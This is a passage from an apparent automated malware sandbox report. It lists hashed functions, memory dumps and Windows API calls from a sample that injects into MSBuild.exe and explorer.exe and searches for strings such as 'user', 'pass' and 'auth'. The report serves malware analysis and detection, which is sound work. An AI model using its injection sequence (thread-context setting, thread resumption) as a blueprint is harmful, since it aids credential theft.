., xrefs: 107DCF1F
t, xrefs: 107DCEF4
l, xrefs: 107DCF26
l, xrefs: 107DCF03

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 59490bd877e05cacb3ee19e3c0eb560b10e7b9fefd8d67f55cca5375cb1c468e
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 22217C74A24A0DDFDB44EFA8D4497ADBBF1FB18304F50462EE109E3610DB74A591CB84

Function 10933E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 10933F1F
t, xrefs: 10933EF4
l, xrefs: 10933F26
l, xrefs: 10933F03

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 0db745d48141e444a53f9e1ea061e06b784523d0042c6b486f592f4867b03ed5
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 47217A74A24A0D9FDB48EFB8D0557AEBAF0FB18305F50462EE009DB600DB78A591CB84

Function 10933E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 10933F1F
t, xrefs: 10933EF4
l, xrefs: 10933F26
l, xrefs: 10933F03

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: a218782f232a24521eeeb6c5ec48a15152bd7145b39de12b7b47f6be2917b435
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: BC218B74A24A0D9BDB48EFB8D0557EEBBF0FB18305F50462EE009DB600DB78A551CB84

Function 0E472FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

logi, xrefs: 0E47303C
user, xrefs: 0E473015
auth, xrefs: 0E47302F
pass, xrefs: 0E473022

Memory Dump Source

Source File: 0000000A.00000002.2476353704.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e380000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: bba0e10a3f7156f841e57235d91fbb82e28ae70165906884253e6238ff0af589
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 5E21AE30614B0D8BCB05DF9A98906EEB7E1EF88344F00561A944AEB348D7B0E9148BD2

Function 107DCFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

user, xrefs: 107DD015
auth, xrefs: 107DD02F
logi, xrefs: 107DD03C
pass, xrefs: 107DD022

Memory Dump Source

Source File: 0000000A.00000002.2477117972.0000000010720000.00000040.00000001.00040000.00000000.sdmp, Offset: 10720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10720000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 648153ec65a3b92a7de8f4343fcc90d32225dcc1895faf9f1fa28fa2236ffa39
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 3121CD30614B0D8BCB45DF9A98816DEB7E1FF88344F024619E80AEB345D7B0E9568BC2

Function 10933FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

pass, xrefs: 10934022
user, xrefs: 10934015
auth, xrefs: 1093402F
logi, xrefs: 1093403C

Memory Dump Source

Source File: 0000000A.00000002.2477305085.0000000010890000.00000040.80000000.00040000.00000000.sdmp, Offset: 10890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10890000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: c1a4d657aabcbc2b9d0a08a4f716b97187b4e352f754d100904a6f50fdb5596d
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 6521CD30614B0D8BCB45CFA998A17DEB7F1EF88344F01461DE41AEB244DBB0E9148BC2

Analysis Process: GcrdXwPgmZ.exePID: 6664, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	61
Total number of Limit Nodes:	6

Executed Functions

Function 027DD551 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 027DD5DE
GetCurrentThread.KERNEL32 ref: 027DD61B
GetCurrentProcess.KERNEL32 ref: 027DD658
GetCurrentThreadId.KERNEL32 ref: 027DD6B1

Memory Dump Source

Source File: 0000000B.00000002.1566207545.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27d0000_GcrdXwPgmZ.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2c01af04d5d6edf7b596285fe33bd2c0313417776c28aed82dd323b6d03af892
Instruction ID: aae0a4fcabdff14b05c79b26d35cd021ba1469b95f1c4570959cf0d7f0e7aec9
Opcode Fuzzy Hash: 2c01af04d5d6edf7b596285fe33bd2c0313417776c28aed82dd323b6d03af892
Instruction Fuzzy Hash: BA5168B1900749CFEB24CFA9D548BEEBBF1EF48304F248459E409AB3A1D7345944CB66

Function 027DD560 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 027DD5DE
GetCurrentThread.KERNEL32 ref: 027DD61B
GetCurrentProcess.KERNEL32 ref: 027DD658
GetCurrentThreadId.KERNEL32 ref: 027DD6B1

Memory Dump Source

Source File: 0000000B.00000002.1566207545.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27d0000_GcrdXwPgmZ.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 43c4eb67545efb2a80dba1cbd98d749005b88651e6ab1f05bf9049c18da31b78
Instruction ID: ef2d311dab401456cf29e79316cde6465c98fba4a5bf7dccc5c3b9a630a74b2c
Opcode Fuzzy Hash: 43c4eb67545efb2a80dba1cbd98d749005b88651e6ab1f05bf9049c18da31b78
Instruction Fuzzy Hash: CE5145B5900309CFEB24DFA9D548BEEBBF1EB48304F248459E409AB360D7346944CB66

Function 027DB2B9 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 027DB51E

Memory Dump Source

Source File: 0000000B.00000002.1566207545.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27d0000_GcrdXwPgmZ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3484bb5022b577616943086076a274c9d60adf1b318152bf4b02be2bfb720d15
Instruction ID: 4c886cea7ca4a9d6a038d6c7c16ddc9ca157fc40a9a134b0210fd7ff1ac873e2
Opcode Fuzzy Hash: 3484bb5022b577616943086076a274c9d60adf1b318152bf4b02be2bfb720d15
Instruction Fuzzy Hash: 6B812670A00B058FD724DF69D05475ABBF2FF88708F14892ED48ADBA50DB35E94ACB91

Function 027D4538 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 027D5DA9

Memory Dump Source

Source File: 0000000B.00000002.1566207545.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27d0000_GcrdXwPgmZ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8d6c96e55f7bf17f8a679b1794efbfdc74926be1007748a8934c4311e680c7c8
Instruction ID: 4f486d2ce2fcf887a88a59147a40b8c0dab81f45c34e810599b011d0f2d233a1
Opcode Fuzzy Hash: 8d6c96e55f7bf17f8a679b1794efbfdc74926be1007748a8934c4311e680c7c8
Instruction Fuzzy Hash: 3A41D170C00719CFEB24DFA9C884B9EBBF5BF48308F60806AD418AB255DB756945CF90

Function 027D5CEC Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 027D5DA9

Memory Dump Source

Source File: 0000000B.00000002.1566207545.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27d0000_GcrdXwPgmZ.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8a9ed570e9ebe75886c7c93a6bddabb1182cc11156ef2cd162bbc354890a6d49
Instruction ID: b7b3fccda06aad0225f8fccd018082ba7f8999b887176a25174e7643d33a2a38
Opcode Fuzzy Hash: 8a9ed570e9ebe75886c7c93a6bddabb1182cc11156ef2cd162bbc354890a6d49
Instruction Fuzzy Hash: 1A41C070C00719CFEB24DFA9C884BDEBBF1AF49308F20806AD418AB255D7756946CF50

Function 06AEA888 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1576629087.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6ae0000_GcrdXwPgmZ.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: e77a57ca5548d4211fb125ba56ca626970e09e4e611afbfc5eec687aa0b4b1da
Instruction ID: 93b69674070a2f8d9bc11475ef34e279e4d6e14bfeb7af95e07a7dc89f91f1cf
Opcode Fuzzy Hash: e77a57ca5548d4211fb125ba56ca626970e09e4e611afbfc5eec687aa0b4b1da
Instruction Fuzzy Hash: B831BC72904389DFCB12DFA9C940ADEBFF4EF09310F14805AEA54AB261C3399954DFA1

Function 06ADF9D1 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ADFA56

Memory Dump Source

Source File: 0000000B.00000002.1576542677.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6ad0000_GcrdXwPgmZ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 29968d30628634e3aee0ca8613b94b4038470779181ce5215bf2346c30762b76
Instruction ID: 2e213e55b65ee8a186a43bdca0f67f89eb1c7b6ce7f4b98a24edc2784c9d4d49
Opcode Fuzzy Hash: 29968d30628634e3aee0ca8613b94b4038470779181ce5215bf2346c30762b76
Instruction Fuzzy Hash: 27215775D003088FDB10DFAAC484BEEBBF0AF48210F14842ED41AAB250CB789945CFA5

Function 06ADF9D8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ADFA56

Memory Dump Source

Source File: 0000000B.00000002.1576542677.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6ad0000_GcrdXwPgmZ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 37598902329dab4bd714e9b245efe57ca5ffa0f3ab1ba180fa5ec1535898ce42
Instruction ID: 7eca196d7320a3bacdccb5f8720d984d0e65a2d2d24d9f1e8e6d411b6fe9d4b9
Opcode Fuzzy Hash: 37598902329dab4bd714e9b245efe57ca5ffa0f3ab1ba180fa5ec1535898ce42
Instruction Fuzzy Hash: FB213871D003088FDB14DFAAC484BEEBBF4EF48214F14842AD519A7250CB789945CFA5

Function 027DD7A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 027DD82F

Memory Dump Source

Source File: 0000000B.00000002.1566207545.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27d0000_GcrdXwPgmZ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e7d298785d73ca8961b89c889cd4bfad956a99d8fd8785595ceb8a88c562cb8e
Instruction ID: 6d8debecd580e070061a9ca5d3130da1a08ed6da7bc6ac1957b2d62690ded858
Opcode Fuzzy Hash: e7d298785d73ca8961b89c889cd4bfad956a99d8fd8785595ceb8a88c562cb8e
Instruction Fuzzy Hash: D221C4B5D00248EFDB10CF9AD584ADEBBF5FB48310F14841AE918A7350D379A944CF65

Function 027DD7A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 027DD82F

Memory Dump Source

Source File: 0000000B.00000002.1566207545.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27d0000_GcrdXwPgmZ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1512133154a222ec7aa16dfd901effe21544379d2b3a7538b0e9102233e98dc1
Instruction ID: 3d23b469507caced8faec19d80b8a58bc82aaef46651a60c7cd0b16638bdb834
Opcode Fuzzy Hash: 1512133154a222ec7aa16dfd901effe21544379d2b3a7538b0e9102233e98dc1
Instruction Fuzzy Hash: B22145B5D00208DFDB10CFA9D584ADEBBF5FB08310F10801AE918A7350C338A944CF61

Function 06AE7624 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06AEA8A2,?,?,?,?,?), ref: 06AEA947

Memory Dump Source

Source File: 0000000B.00000002.1576629087.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6ae0000_GcrdXwPgmZ.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: f7f9ff6a2d9b65f80ab73201042cca96b2315333e8f2a39eb38fadcedb52e088
Instruction ID: 4184953b10d7103982f480fbd5c545b1006894a232c1ed8633110f0a328ac0eb
Opcode Fuzzy Hash: f7f9ff6a2d9b65f80ab73201042cca96b2315333e8f2a39eb38fadcedb52e088
Instruction Fuzzy Hash: 93112975800349DFDB20DF9AD844BDEBBF8EB48320F14841AEA54A7250C379A950DFA5

Function 06ADF920 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06ADF98A

Memory Dump Source

Source File: 0000000B.00000002.1576542677.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6ad0000_GcrdXwPgmZ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c09d7389decae2e87d29fa764ff12e46d22845a30077e5de3896531ecfe8435b
Instruction ID: 9644e86b5ea671e2a44b042233b81f312f7fd4b02c0949e02ce7687b052a689c
Opcode Fuzzy Hash: c09d7389decae2e87d29fa764ff12e46d22845a30077e5de3896531ecfe8435b
Instruction Fuzzy Hash: 18115B75D003488FDB24DFAAC4447EFFBF4AF88214F24841ED41AA7650C6796544CF95

Function 06ADF928 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06ADF98A

Memory Dump Source

Source File: 0000000B.00000002.1576542677.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6ad0000_GcrdXwPgmZ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2aa2f2c68a9d48cfa32749db65e59c69feaefdeba6853934344d2c86c9ad56b9
Instruction ID: ceca11d02e6c86b41039dc5fb29c7d4fd53f39dc9f52a47b56d3cfb4bfd3b428
Opcode Fuzzy Hash: 2aa2f2c68a9d48cfa32749db65e59c69feaefdeba6853934344d2c86c9ad56b9
Instruction Fuzzy Hash: 6B113A71D003488FDB24DFAAC4447EFFBF4EF48224F14841AD519A7250CB79A940CB95

Function 027DB4B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 027DB51E

Memory Dump Source

Source File: 0000000B.00000002.1566207545.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27d0000_GcrdXwPgmZ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f5d8eaeb24be63e7db4df254b6b598364c703ae817c7120a28425a4660f8042b
Instruction ID: bd13f28d45a4ddbaa5743aa34b8779d0a32b676f72ef706d1b7fe969bdf4c42c
Opcode Fuzzy Hash: f5d8eaeb24be63e7db4df254b6b598364c703ae817c7120a28425a4660f8042b
Instruction Fuzzy Hash: 12110FB6C002498FDB20CF9AD444BDEFBF4EB88328F15842AD419A7210D379A545CFA1

Function 00B8D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1562285391.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b8d000_GcrdXwPgmZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb6dd8cf88dc65b0c65567ba60caec4bfd7c4bc055921f657c26ea5d8ed6e373
Instruction ID: 5eb9ba353d2cea339dfc14eb36f5d6200a09453be217e8508ce0aea5fd03cc74
Opcode Fuzzy Hash: bb6dd8cf88dc65b0c65567ba60caec4bfd7c4bc055921f657c26ea5d8ed6e373
Instruction Fuzzy Hash: 4821FB71504204DFDB15EF14D5C0B16BBA5FB94314F24C5AEE9090F3A6C336E856CBA2

Function 0264D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1565700506.000000000264D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0264D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_264d000_GcrdXwPgmZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 474951c0bdf39f87d854e0bdc93936a47e29ee10d024c2ce73530df15a62a3f5
Instruction ID: 702661b0e400e6324f0924a06172ad9aec053ae6829bc4ed3c6549f6857d59fd
Opcode Fuzzy Hash: 474951c0bdf39f87d854e0bdc93936a47e29ee10d024c2ce73530df15a62a3f5
Instruction Fuzzy Hash: 2221F571A04200EFDB15DF14D5C0B26BBA5FB84318F20C66DEE894B392C736D446CA61

Function 0264D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1565700506.000000000264D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0264D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_264d000_GcrdXwPgmZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 494a70faddd6f7f719f9286ed021f07ae72fe9df9f2ab6a97fdf4707566db54c
Instruction ID: bfd895405f75ecc8437fc93f647a725166de6adb4f838132b32cd5d25cf64d01
Opcode Fuzzy Hash: 494a70faddd6f7f719f9286ed021f07ae72fe9df9f2ab6a97fdf4707566db54c
Instruction Fuzzy Hash: 4221F571904380DFDB18DF24D5C4B16BB65FB84714F20C56DE88A4B396C736E447CA62

Function 0264D006 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1565700506.000000000264D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0264D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_264d000_GcrdXwPgmZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424d447d5ee522524d1b394f4ee2b08457f3a4544c3b5437fa591d71a97ec742
Instruction ID: f8b71116b54bfa9ae8eb922b866a25c12d13972c986a9984c5863954a13f7670
Opcode Fuzzy Hash: 424d447d5ee522524d1b394f4ee2b08457f3a4544c3b5437fa591d71a97ec742
Instruction Fuzzy Hash: B4219F755093C09FCB16CF20D994715BF71EB46614F28C5EAD8898F6A7C33A980ACB62

Function 00B8D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1562285391.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b8d000_GcrdXwPgmZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction ID: eab32124de3d8939cb9e1f9a062452543d784ee37b55a365b7ab35ee9ef5f8d3
Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
Instruction Fuzzy Hash: 8411B476504240DFDB15DF10D5C4B16BFB1FB94314F28C6AAD9090B7A6C33AD456CB91

Function 0264D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1565700506.000000000264D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0264D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_264d000_GcrdXwPgmZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction ID: ad3f0710c8a534b725140f4534a6177ec2406c55dc02c514f51db9371b803973
Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
Instruction Fuzzy Hash: 04118B75904280DFDB15DF10D5C4B16FBA1FB84314F24C6A9DD894B796C33AD44ACB62

Analysis Process: MSBuild.exePID: 7444, Parent PID: 6664COMMON

Execution Graph

Execution Coverage:	0.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	34
Total number of Limit Nodes:	2

Executed Functions

Function 010D2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(010EFD4F,000000FF,00000024,01186634,00000004,00000000,?,-00000018,7D810F61,?,?,010A8B12,?,?,?,?), ref: 010D2C24

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 089466420714187dc3e750ef58f78446c7cf06736789b0a1fb047c7efabdbeed
Instruction ID: 7bf206ca80d39c46054d2edb5141890dccd99147f55c1d691de11782c4d430a1
Opcode Fuzzy Hash: 089466420714187dc3e750ef58f78446c7cf06736789b0a1fb047c7efabdbeed
Instruction Fuzzy Hash: 3EB09B719016C5C9EA52E764460C717794077D0701F19C062D2430641F4738C5D1E275

Function 010D2B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(01100DBD,?,?,?,?,010F4302), ref: 010D2B6A

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 12d25f30a95a0994e9266163189c247a0a4ebcde7edef50ab869d7f48e5612ef
Instruction ID: e886951f6f320f626ec318c11ee037f6473b31cc0d6a75bacea3c66a7283d752
Opcode Fuzzy Hash: 12d25f30a95a0994e9266163189c247a0a4ebcde7edef50ab869d7f48e5612ef
Instruction Fuzzy Hash: 8890026120240007510571598418616804A97E0201B59C022E1414590DC52589916225

Function 010D2BF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(010E7BA5,000000FF,?,00000000,?,00001000,00000000,?,-00000018,7D810F61,?,?,?,?), ref: 010D2BFA

Memory Dump Source

Source File: 0000000F.00000002.1650031633.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01060000, based on PE: true

Associated: 0000000F.00000002.1650031633.0000000001060000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001067000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.00000000010E6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001122000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001183000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1650031633.0000000001189000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1060000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c5955a142a4db53bd1fb8e13507367eb96adeaf44555fa7b8927470ba38db20b
Instruction ID: 4121bfc402c2cceec8813d77d6c474cd307fbf02a6ce67907837003ebdbabc40
Opcode Fuzzy Hash: c5955a142a4db53bd1fb8e13507367eb96adeaf44555fa7b8927470ba38db20b
Instruction Fuzzy Hash: 8E90023120140806E1807159840864A404597D1301F99C016A0425654DCA158B5977A1

